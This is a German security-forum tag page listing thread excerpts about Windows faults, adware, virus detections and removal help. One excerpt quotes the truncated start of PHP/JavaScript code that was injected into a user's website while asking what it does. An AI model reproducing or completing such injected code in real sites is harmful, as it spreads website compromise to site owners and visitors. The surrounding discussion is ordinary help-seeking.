Zurück   Trojaner-Board > Themen

Alles zum Thema: Bewirkt

  Letzter Beitrag Antworten Hits Forum
Windows Explorer startet als Task, wird aber nicht angezeigt (ebenso Google Chrome)
Bewirkt - Hallo, ich habe gleich 2 (gleiche) Probleme mit dem PC. Wenn ich den Windows Explorer starte, wird dieser zwar in der Taskleiste angezeigt, aber er startet nicht im Vollbild. Ich kann dann auf das Icon in der Tastleiste klicken, aber es bewirkt keinen Vollbildmodus. Wenn ich den Explorer nun...
Alles rund um Windows
Win10, Lenovo: Akku wird nicht erkannt
Bewirkt - Mahlzeit zusammen, erstmal ein Frohes Neues Jahr in die Runde! :) Und kaum hat das neue Jahr begonnen, geht auch schon der alljährliche Computer-Ärger los :stirn:: Nachdem sich seit ca. Spätsommer 2017 mein Laptop im Akkubetrieb nicht mehr starten ließ, hab ich das intuitiv auf den Akku...
Alles rund um Windows
Exe-Dateien sind nur noch 4KB groß und unbrauchbar
Bewirkt - Hallo, ich habe seit gestern auf 4 Servern ein Problem, und zwar sind (fast) alle exe-Dateien unbrauchbar. Sie werden zwar mit ihrem korrekten Dateinamen angezeigt, werden aber als Dateityp "Windows-Batchdatei" angezeigt und haben eine Größe von 4KB (3,62 KB). Der Zeitstempel all dieser...
Plagegeister aller Art und deren Bekämpfung
Fernzugriffssymbol? ggf. Trojaner?
Bewirkt - Hallo Zusammen, zunächst einmal möchte ich mich vorstellen. Ich heiße Patrick, 26, und komme aus Berlin. Zu meinem Problem, warum ich mich hier angemeldet habe und wo ich hilfe von euch erhoffe. Ich besitze ein Samsung Galaxy S5 mit Android 5.0 und habe seit Freitag (05.02.) das Problem,...
Smartphone, Tablet & Handy Security
Signifikante Häufung nicht aufrufbarer Seiten in letzter Zeit (Chrome) + Internet Explorer lässt sich nicht starten Meldung
Bewirkt - Hallo, also bei mir lassen sich so seit ca. 3 Wochen immer häufiger Seiten nicht öffnen. (Teilweise nur kurzzeitig). Zuerst gab es da 2 mal eine schlichte Fehlermeldung vor grauem Hintergrund, deren genauen Wortlaut ich mir leider nicht notiert habe, bei Seiten, bei denen es eigentl. nie...
Plagegeister aller Art und deren Bekämpfung
rdsrv.com?
Bewirkt - rdsrv.com Ich finde nirgends ein Programm, mit dem ich ihn entfernen kann. er bewirkt, dass beim ersten Klick auf eine link irgendeine Werbeseite kommt, erst beim zweiten klick kommt die gewollte seite bin relativ ratlos spybot findet nix... suche Programm zum Entfernen von rdsrv.com Trojaner...
Plagegeister aller Art und deren Bekämpfung
Roll Around unerwünschte Browserwerbung Windows8
Bewirkt - Hallo, habe bei der gestrigen Installation eines Converters vermutlich ein unerwünschtes Programm mitinstalliert. Dieses bewirkt in meinem Browser unerwünschte Werbeanzeigen, Popups und Browserabstürze. Das Problem besteht seit dem erneuten Start heute Morgen. Entgegen der mir vorher unbekannten...
Plagegeister aller Art und deren Bekämpfung
Windows XP - Press Tab to show POST screen
Bewirkt - Hallo, das Thema gab es zwar schon einmal, aber die Antworten auf den damaligen Beitrag eines Nutzers haben mir nicht weiter geholfen. Bei Hochfahren des Rechners erscheint die Meldung "Press Tab to Show Post Screen". Die Benutzung der Tab- Taste bewirkt nichts. Der Rechner war in einem...
Log-Analyse und Auswertung
Tastaturbelegung plötzlich geändert
Bewirkt - Hallo, ich bin etwas entnervt, ich habe sowas noch nie gesehen udn google kennt dieses problem scheinbar nicht. Seit 2 Tagen bekomme ich, wenn ich die "Enter" Taste drücke einen "/" (slash), die rechte Pfeiltaste bewirkt den "Pfeilnachunten" Effekt, also runterscrollen udn die "5" vom Nummernblock...
Log-Analyse und Auswertung
Systempartitionsbuchstaben ändern sinnvoll gegen Viren?
Bewirkt - Hallo :heilig: Macht es Sinn, den Laufwerkbuchstaben der Systempartition (oder des ganzen c: ) zu ändern, da sich viele Viren automatisch ins c: kopieren (stimmt das überhaupt)? Oder bewirkt das nichts, weil sie sowieso in die Registry geschrieben werden? :dankeschoen:
Diskussionsforum
Sicherungs und Firewall Problem
Bewirkt - Guten Tag Ich habe seit einigen Tagen ein 2 Probleme welche ich jetzt auch nicht selber in den Griff bekomme weshalb ich auf eure Hilfe hoffe. Problem1: Ich kann keine Sicherungen an meinem Laptop machen immer wenn ich dies tun will kommt eine solche Fehlermeldung: Die Transaktionsunterstützung...
Alles rund um Windows
TrojanDownloader win32/adload.da-virus
Bewirkt - hallo zusammen, heute hat windows 7 bei problemen gemeldet, dass ein trojandownloader: win32/adload.da-virus entfernt werden muss. mein antivirenprogramm comodo internetsecurity premium hat nichts gefunden. windows safety scanner hat auch nichts gefunden. was sollte ich dagegen machen? was...
Plagegeister aller Art und deren Bekämpfung
Plötzliches Datenpeak im Netzwerk, welches eben dieses lahm legt
Bewirkt - Hallo, seit heute habe ich Probleme mit meinem Internet. Ich habe regelmäßig ein plötzliches, sehr kurzes Datenpeak, was dazu führt, dass das ganze Internet kurz hängen bleibt. Über den Resourcenmonitor kann ich nicht herausfinden, welcher Prozess dies bewirkt, weil er jedes mal genau dann...
Plagegeister aller Art und deren Bekämpfung
Lyricxeeker entfernt, aber Laptop immer noch langsam
Bewirkt - Hiho, bin neu hier. Auch wenn ich euer Engagement schätze, hatte ich natürlich gehofft es nie in Anspruch nehmen zu müssen ;) Jetzt habe ich seit etwa 2 Tagen ein kleines Problem. Mein Laptop fing während eines Computerspiels (WoW) an langsamer zu werden. Sobald ich zwischen Spiel und...
Plagegeister aller Art und deren Bekämpfung
win32/small.ca-virus
Bewirkt - Hallo habe heute folgende fehlermeldung bekommen: Windows hat win32/small.ca-virus, einen bekannten Computervirus auf ihrem Pc erkannt. win32/small.ca-virus hat bewirkt, das ihr Pc 2 mal nicht ordnugsgemäß funtioniert hat.. Ich hoffe ihr könnt mir weiterhelfen, dass dieses Problem möglichst...
Plagegeister aller Art und deren Bekämpfung
[WEB] Code-Einschleusung
Bewirkt - Hallo zusammen! Ich weiß nicht ob sich hier jemand mit dem Thema auskennt. Vor kurzem wurde auf einer meiner Webseiten folgendes eingeschleust: #0f2490# if(empty($tqz)) {$tqz = "<script type=\"text/javascript\" language=\"javascript\"...
Diskussionsforum
Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag?
Bewirkt - Hallo, nachdem ich hier schon öfter Hilfe ohne neuen Thread finden konnte habe ich jetzt doch eine Frage. Ich habe mir einen Schädling eingefangen der einen String Wert im Firefox erstellt. Die Entfernung läuft gerade, mich würde aber interessieren was der Eintrag genau bewirkt. Klingt nach...
Plagegeister aller Art und deren Bekämpfung
Windows hat Win32/Small.CA Meldung im Wartungscenter
Bewirkt - Hallo, im Windows Wartungscenter (Windows 7 Ulimate 64 bit) erscheint die Meldung: "Windows hat Win32/Small.CA, einen bekannten Computervirus, auf Ihrem PC erkannt. Win32/Small.CA hat bewirkt, dass Ihr PC 1 Mal nicht ordnungsgemäß funktioniert hat." Bei mir ist wie in einem anderen...
Plagegeister aller Art und deren Bekämpfung
SoftwareUpdater.ui.exe
Bewirkt - Hallo, seit einiger zeit erscheint nach dem hochfahren und auch zwischendurch der SoftwareUpdater.ui.exe,wo man entweder abbrechen oder zulassen drücken kann.habe beides schon getan,bisher ist aber scheinbar nix passiert. vor entdecken dieses forums hab ich diese datei mit hilfe des ccleaners...
Plagegeister aller Art und deren Bekämpfung
Win32/Small.CA-Virus
Bewirkt - Das Wartungscenter meines Computers (mit Windows 7 64 bit) meldet mir: "Windows hat Win32/Small.CA, einen bekannten Computervirus, auf Ihrem PC erkannt. Win32/Small.CA hat bewirkt, dass Ihr PC 1 Mal nicht ordnungsgemäß funktioniert hat." Überprüfungen mit Windows Defender und Sophos erkannten...
Plagegeister aller Art und deren Bekämpfung
TrojanDownloader:Win32/Adload.DA
Bewirkt - Hallo ihr lieben Helfer, ich bekomme seit einigen Tagen immer wieder eine Sicherheitsmeldung von Windows: Entfernen des TrojanDownloader:Win32/Adload.DA-Virus Windows hat TrojanDownloader:Win32/Adload.DA, einen bekannten Computervirus, auf Ihrem PC erkannt. TrojanDownloader:Win32/Adload.DA...
Log-Analyse und Auswertung
Iminent - Benötige Auskunft/Hilfe
Bewirkt - Guten Tag! Wie der Titel schon sagt es geht hier um das Porgramm "Iminent". Heute entdeckte ich in meiner Taskleiste ein neues Symbol, so eine Art Smilie. Da ich das Programm nicht selber geladen habe, habe ich dies mit CC Cleaner entfernt(dies war eine was ist das? Bloß weg damit reaktion...
Plagegeister aller Art und deren Bekämpfung
TrojanDownloader: Win32/Adload.DA-Virus
Bewirkt - hallo zusammen, am sonntag hat windows bei problemen gemeldet, dass ein trojandownloader: win32/adload.da-virus entfernt werden muss. mein antivirenprogramm g data internetsecurity 2013 hat nichts gefunden. ich habe dann nochmal mit dem windows safety scanner geschaut, wo auch nichts gefunden...
Plagegeister aller Art und deren Bekämpfung
nmIndexstoresvr.exe unter XP
Bewirkt - Ein hallo ans Forum! Ich bin mir nicht sicher, ob dies hier die richtige Unterabteilung ist, aber trotzdem: Eine Freundin hat das Problem, dass sich andauernd ein Fenster auftut mit der Meldung: nmindexstoresvr.exe hat ein problem festgestellt Dann habe ich recherchiert und a)...
Alles rund um Windows
"Spyhunter 4" halb entfernt?
Bewirkt - Hallo zusammen, Folgendes: Ich lade mir Freeware runter und bemerkt das meine Suchfunktion anders ist (Deltasearch!). Ich google nach Programmen gegen Deltasearch, lade mir leichtgläubig Spyhunter4 und installiere es erfolgreich:stirn:, bis ich das interface zu sehen bekomme und ich mich an...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.